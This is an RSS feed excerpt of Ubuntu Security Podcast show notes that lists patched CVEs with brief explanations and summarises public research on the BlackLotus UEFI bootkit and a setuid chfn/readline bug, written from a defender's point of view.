<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-48303">CVE-2022-48303</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>1-byte OOB read - although as yet no evidence this can be used to gain control
flow hence really only a possible DoS</li>
</ul>
<h3 id="usn-5880-2-firefox-regressions-06-42">[<a href="https://ubuntu.com/security/notices/USN-5880-2">USN-5880-2</a>] Firefox regressions [06:42]</h3>
<ul>
<li>15 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-25745">CVE-2023-25745</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25744">CVE-2023-25744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25742">CVE-2023-25742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25741">CVE-2023-25741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25737">CVE-2023-25737</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25736">CVE-2023-25736</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25733">CVE-2023-25733</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25731">CVE-2023-25731</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25739">CVE-2023-25739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25735">CVE-2023-25735</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25732">CVE-2023-25732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25730">CVE-2023-25730</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25729">CVE-2023-25729</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25728">CVE-2023-25728</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0767">CVE-2023-0767</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>110.0.1 - biggest regression was that if chose to clear recent cookies it
would clear <strong>all</strong> cookies - plus a webgl crash when running under vmware on
Linux</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="blacklotus-uefi-bootkit-teardown-07-23">BlackLotus UEFI bootkit teardown [07:23]</h3>
<ul>
<li><a href="https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/">https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/</a></li>
<li><a href="https://github.com/Wack0/CVE-2022-21894">https://github.com/Wack0/CVE-2022-21894</a></li>
<li>Teardown of the first in-the-wild UEFI bootkit that bypasses UEFI Secure Boot
by eset</li>
<li>Appears to be <a href="https://www.bleepingcomputer.com/news/security/malware-dev-claims-to-sell-new-blacklotus-windows-uefi-bootkit/">BlackLotus</a> which has been sold on hacking and criminal forums
since atleast October 2022</li>
<li>At that time no sample was available so security researchers could not verify
the claims of the malware author, namely:
<ul>
<li>very small - only 80kb, has anti-debug / obfuscation to help avoid RE</li>
<li>bypasses Windows UAC + Secure Boot and can load unsigned drivers</li>
<li>disables HVCI (hypervisor protected code integrity - a feature designed to
protect the Windows kernel from modification at runtime), BitLocker and
Windows Defender</li>
<li>persists in UEFI and is able to protect itself from being unloaded</li>
<li>uses a signed boot loader so can work on machines with Secure Boot enabled</li>
</ul>
</li>
<li>Of these, the most interesting part for Linux users is the UEFI Secure Boot
bypass - this is something which we theorised was possible via all the
previously disclosed shim and <a href="/episode-84/#alex-and-joe-take-an-in-depth-and-behind-the-scenes-look-at-boothole-grub-2-08-14">grub vulnerabilities</a>
<ul>
<li>And in particular, they way they go about this is by using a copy of <code>shim</code>
and <code>grub</code> - but not because they are exploiting any vulnerabilities in them,
but since they are very useful components if you want to boot your own
bootkit</li>
<li>they also exploit a vulnerability in the Windows Boot Manager UEFI binary
which allows them to subvert the Secure Boot process and load their own code
to bypass Secure Boot and gain persistence on future boots</li>
<li>they way they do this is to install their own UEFI binaries into the EFI
partition (including <code>shim</code> and <code>grub</code>) - but also a copy of a vulnerable
version of the Windows Boot Manager UEFI binary plus their own custom boot
configuration data - and since they have disabled BitLocker already these
will happily be loaded at next boot without the usual integrity checks etc</li>
<li>when the machine reboots, their vulnerable Windows Boot Manager binary is
loaded, along with their custom boot configuration data which allows them to
exploit the vulnerability and to then load additional binaries into the boot
process</li>
<li>those binaries then go on to modify the secure boot configuration by
enrolling a new key in the machine owners keyring (aka MOK) db
<ul>
<li>normally enrolling a new key like this would require a system admin to be
physically present to confirm the operation - but since they bypasses the
normal Secure Boot protections this can be done without any knowledge of
the sysadmin</li>
</ul>
</li>
<li>their <code>grub</code> is signed using this key whilst the <code>shim</code> is Red Hat&rsquo;s <code>shim</code> -
unmodified and signed by Microsoft and hence trusted - this will then trust
their malicious <code>grub</code> as it is signed by the key they just enrolled in the
MOK</li>
<li>whilst their <code>shim</code> is an unmodified copy, their <code>grub</code> is not - and is actually
malicious</li>
<li><code>shim</code> then goes on to boot this malicious <code>grub</code> which starts Windows but also
installs a bunch of UEFI memory hooks to be able to subvert further stages
of the boot process and eventually Windows itself</li>
</ul>
</li>
<li>There are lots more details in the teardown article, particularly about how
the various components are installed into Windows and how they are able to
then load additional drivers etc into Windows, plus the further components of
the malware that are able to download additional binaries, how the C2 and
anti-analysis etc works - but this is the USP so we won&rsquo;t cover those here</li>
<li>But what is interesting for Linux is that this is reusing components that were
ostensibly designed to boot Linux on machines that were originally designed to
boot Windows
<ul>
<li>one member of our team wondered if Microsoft might become more hesitant
about signing <code>shim</code> in the future - perhaps, but it is not really <code>shim</code> that
is at fault here - the issue is the original vulnerability in the Windows
Boot Manager - <code>shim</code> just helps to make loading additional parts of their
bootkit easier (along with <code>grub</code>) - so hopefully Microsoft don&rsquo;t go down that
path</li>
<li>and the reason this can be exploited in the first place is that Microsoft
have not revoked their vulnerable Windows Boot Manager binary
<ul>
<li>back in the original BootHole vulns, various <code>shim</code>&rsquo;s did get revoked - but
revoking this Microsoft binary would mean many older systems may fail to
boot, including their recovery images and install media etc</li>
<li>ideally Microsoft would revoke this to stop further exploitation</li>
</ul>
</li>
</ul>
</li>
<li>Another interesting wrinkle is that their UEFI exploit apparently appears to
come directly from a <a href="https://github.com/Wack0/CVE-2022-21894">PoC</a> that was uploaded to Github in August 2022 - will
likely restart the usual discussions around public PoCs being a &ldquo;bad thing&rdquo; as
they can be used for actual malicious purposes
<ul>
<li>interesting to note the PoC has had additional code added to it in the last
24 hours which allow it to operate on older versions of Windows 10</li>
<li>even more reason for Microsoft to perhaps revoke this old binary</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E189.mp3" length="17986383" type="audio/mpeg" /><itunes:duration>1034</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 188
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-188/</link>
          <pubDate>Fri, 24 Feb 2023 21:27:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>e826ae028458f83f730a352ef7eed99d35b851ae298b7f65a8c8fea674ecafcabb71e23fdad5c86db3581fc1b2102b5f96684d145bc501c09af972348d79d9c9</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 188</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week the common theme is vulnerabilities in setuid-root binaries and their
  use of environment variables, so we take a look at a great blog post from the
  Trail of Bits team about one such example in the venerable `chfn` plus we look...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week the common theme is vulnerabilities in setuid-root binaries and their
  use of environment variables, so we take a look at a great blog post from the
  Trail of Bits team about one such example in the venerable `chfn` plus we look at
  some security vulnerabilities in, and updates for the Linux kernel, Go Text, the
  X Server and more, and finally we cover the recent announcement of Ubuntu
  22.04.2 LTS.
  </itunes:summary>
        <description>  This week the common theme is vulnerabilities in setuid-root binaries and their
  use of environment variables, so we take a look at a great blog post from the
  Trail of Bits team about one such example in the venerable `chfn` plus we look at
  some security vulnerabilities in, and updates for the Linux kernel, Go Text, the
  X Server and more, and finally we cover the recent announcement of Ubuntu
  22.04.2 LTS.
  </description>
        <googleplay:description>  This week the common theme is vulnerabilities in setuid-root binaries and their
  use of environment variables, so we take a look at a great blog post from the
  Trail of Bits team about one such example in the venerable `chfn` plus we look at
  some security vulnerabilities in, and updates for the Linux kernel, Go Text, the
  X Server and more, and finally we cover the recent announcement of Ubuntu
  22.04.2 LTS.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week the common theme is vulnerabilities in setuid-root binaries and their
use of environment variables, so we take a look at a great blog post from the
Trail of Bits team about one such example in the venerable <code>chfn</code> plus we look at
some security vulnerabilities in, and updates for the Linux kernel, Go Text, the
X Server and more, and finally we cover the recent announcement of Ubuntu
22.04.2 LTS.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>75 unique CVEs addressed</p>
<h3 id="usn-5872-1-nss-vulnerabilities-00-57">[<a href="https://ubuntu.com/security/notices/USN-5872-1">USN-5872-1</a>] NSS vulnerabilities [00:57]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-34480">CVE-2022-34480</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22747">CVE-2022-22747</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5874-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5874-1">USN-5874-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-20928">CVE-2023-20928</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42895">CVE-2022-42895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3640">CVE-2022-3640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3628">CVE-2022-3628</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5877-1-linux-kernel--gke--vulnerabilities-01-06">[<a href="https://ubuntu.com/security/notices/USN-5877-1">USN-5877-1</a>] Linux kernel (GKE) vulnerabilities [01:06]</h3>
<ul>
<li>28 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0590">CVE-2023-0590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47940">CVE-2022-47940</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4662">CVE-2022-4662</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42895">CVE-2022-42895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4095">CVE-2022-4095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40307">CVE-2022-40307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39842">CVE-2022-39842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39188">CVE-2022-39188</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3640">CVE-2022-3640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3628">CVE-2022-3628</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3623">CVE-2022-3623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3619">CVE-2022-3619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3586">CVE-2022-3586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3543">CVE-2022-3543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3303">CVE-2022-3303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3061">CVE-2022-3061</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20421">CVE-2022-20421</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0171">CVE-2022-0171</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4378">CVE-2022-4378</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF in L2CAP handshake implementation in bluetooth subsystem - as is in
handshake likely can allow an unprivileged remote attacker within bluetooth
range to crash kernel / leak contents of memory or get RCE - or even a local
unprivileged user could use this to try and escalate their privileges by
turning on bluetooth then attacking the machine via it</li>
<li>Stack buffer overflow in handling of sysctl - need to be able to write a
sysctl which is normally only available to root - <strong>but also can be used by root
within a user namespace</strong> - so if have unprivileged user namespaces enabled then
a local unpriv user can use this to either crash the kernel or possibly
execute arbitrary code within the kernel -&gt; EoP</li>
</ul>
<h3 id="usn-5875-1-linux-kernel--gke--vulnerabilities-03-20">[<a href="https://ubuntu.com/security/notices/USN-5875-1">USN-5875-1</a>] Linux kernel (GKE) vulnerabilities [03:20]</h3>
<ul>
<li>11 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-20928">CVE-2023-20928</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42895">CVE-2022-42895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3640">CVE-2022-3640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3628">CVE-2022-3628</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>bluetooth UAF</li>
<li>Buffer overflow in the in-kernel NFSD implementation - <a href="https://ubuntusecuritypodcast.org/episode-184/">Episode 184</a></li>
</ul>
<h3 id="usn-5876-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5876-1">USN-5876-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0590">CVE-2023-0590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47940">CVE-2022-47940</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42895">CVE-2022-42895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3640">CVE-2022-3640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3628">CVE-2022-3628</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3623">CVE-2022-3623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3619">CVE-2022-3619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3543">CVE-2022-3543</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5878-1-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5878-1">USN-5878-1</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0590">CVE-2023-0590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42895">CVE-2022-42895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3640">CVE-2022-3640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3628">CVE-2022-3628</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3619">CVE-2022-3619</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5879-1-linux-kernel--hwe--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5879-1">USN-5879-1</a>] Linux kernel (HWE) vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0590">CVE-2023-0590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42895">CVE-2022-42895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3640">CVE-2022-3640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3628">CVE-2022-3628</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3619">CVE-2022-3619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4378">CVE-2022-4378</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5873-1-go-text-vulnerabilities-03-54">[<a href="https://ubuntu.com/security/notices/USN-5873-1">USN-5873-1</a>] Go Text vulnerabilities [03:54]</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-32149">CVE-2022-32149</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38561">CVE-2021-38561</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28852">CVE-2020-28852</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28851">CVE-2020-28851</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14040">CVE-2020-14040</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Go lib for text processsing, in particular for handling of Unicode</li>
<li>CPU-based DoS - possible infinite loop on crafted content</li>
<li>Various runtime DoS issues - crafted content could trigger a panic -&gt; crash of
application - often used for parsing of HTTP headers</li>
<li>One of the few cases of a USN where we list the -dev package as the affected
package - quirk of the way Go packages are packaged in Debian and hence
Ubuntu - since go binaries are generally statically compiled, another package
will use the -dev package to build and get statically linked against this - so
the security team has to then rebuild all the other packages in the archive
that use this -dev package</li>
</ul>
<h3 id="usn-5880-1-firefox-vulnerabilities-07-15">[<a href="https://ubuntu.com/security/notices/USN-5880-1">USN-5880-1</a>] Firefox vulnerabilities [07:15]</h3>
<ul>
<li>15 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-25745">CVE-2023-25745</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25744">CVE-2023-25744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25742">CVE-2023-25742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25741">CVE-2023-25741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25737">CVE-2023-25737</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25736">CVE-2023-25736</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25733">CVE-2023-25733</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25731">CVE-2023-25731</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25739">CVE-2023-25739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25735">CVE-2023-25735</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25732">CVE-2023-25732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25730">CVE-2023-25730</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25729">CVE-2023-25729</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25728">CVE-2023-25728</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0767">CVE-2023-0767</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>110.0 release - various memory corruption vulns plus some logic issues
allowing to bypass restrictions etc</li>
</ul>
<h3 id="usn-5881-1-chromium-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5881-1">USN-5881-1</a>] Chromium vulnerabilities</h3>
<ul>
<li>13 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0704">CVE-2023-0704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0703">CVE-2023-0703</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0701">CVE-2023-0701</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0700">CVE-2023-0700</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0474">CVE-2023-0474</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0705">CVE-2023-0705</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0702">CVE-2023-0702</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0699">CVE-2023-0699</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0698">CVE-2023-0698</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0696">CVE-2023-0696</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0473">CVE-2023-0473</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0472">CVE-2023-0472</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0471">CVE-2023-0471</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>110.0.5481.100 release</li>
<li>also has various memory corruption vulns fixed, same original policy bypass
etc</li>
</ul>
<h3 id="usn-5778-2-x-dot-org-x-server-vulnerabilities-08-15">[<a href="https://ubuntu.com/security/notices/USN-5778-2">USN-5778-2</a>] X.Org X Server vulnerabilities [08:15]</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0494">CVE-2023-0494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46344">CVE-2022-46344</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46343">CVE-2022-46343</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46342">CVE-2022-46342</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46341">CVE-2022-46341</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46340">CVE-2022-46340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4283">CVE-2022-4283</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various possible attacks against the X server - UAF, stack and heap buffer
overflows etc -&gt; local user could then possibly get EoP when X server is
running as root (as it is on these older releases - only on 18.04 and onwards
does X run as the unprivileged user)</li>
</ul>
<h3 id="usn-5807-2-libxpm-vulnerabilities-09-01">[<a href="https://ubuntu.com/security/notices/USN-5807-2">USN-5807-2</a>] libXpm vulnerabilities [09:01]</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-4883">CVE-2022-4883</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46285">CVE-2022-46285</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-44617">CVE-2022-44617</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>X11 pixmap handling library</li>
<li>2 CPU-based DoS (infinite loop) issues plus one in handling of compressed
files - would call out to external binaries to decompress these - so if a
malicious user could influence the <code>PATH</code> environment variable could get it to
execute their binaries instead - particularly could be an issue if a setuid()
binary uses libxpm - and this is mentioned in the glibc manual around <a href="https://www.gnu.org/software/libc/manual/html_node/Tips-for-Setuid.html">tips for
writing setuid programs</a></li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="readline-crime-exploiting-a-suid-logic-bug-10-06">Readline crime: exploiting a SUID logic bug [10:06]</h3>
<ul>
<li>Trail of Bits blog has a <a href="https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline">great writeup</a> of a bug they discovered in <code>chfn</code> as
implemented by the <code>util-linux</code> package - used the <code>readline</code> library for input
handling by many CLI applications - as a result, able to be abused to read the
contents of a root-owned SSH private key</li>
<li>Great dive into the complexities and dangers of using third party libraries in
privileged components</li>
<li>Inspired by a previous
<a href="https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt">finding
from Qualys</a>, started out looking for setuid binaries that used environment
variables as part of their operation - since this often allows an unprivileged
user to set that env var and then run the setuid binary which then runs as
root - if it then can be influenced by the value of that env var can possibly
then go further to cause other effects as root (EoP?)</li>
